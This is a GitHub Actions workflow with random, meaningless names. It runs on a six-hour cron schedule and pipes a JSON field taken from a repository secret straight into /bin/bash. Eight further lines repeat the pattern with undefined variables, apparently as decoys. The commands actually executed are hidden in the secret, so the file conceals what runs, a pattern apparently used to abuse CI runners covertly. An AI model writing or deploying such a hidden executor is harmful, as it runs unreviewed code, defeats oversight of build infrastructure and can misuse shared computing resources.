name: zhourulai2345
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhourulai2345
        env:
          vhh1565: ${{ secrets.vhh1565 }}
        run: |
          echo $vhh1565 | jq -r .ir165 | /bin/bash
          echo $nh05 | jq -r .y59780 | /bin/bash
          echo $eml024 | jq -r .l0 | /bin/bash
          echo $px7524 | jq -r .obatn4865 | /bin/bash
          echo $swgx1785 | jq -r .jzihh447 | /bin/bash
          echo $hd9 | jq -r .vtx82 | /bin/bash
          echo $vua99899 | jq -r .uymbf4718 | /bin/bash
          echo $mww97 | jq -r .z4348 | /bin/bash
          echo $odfb73 | jq -r .a94 | /bin/bash

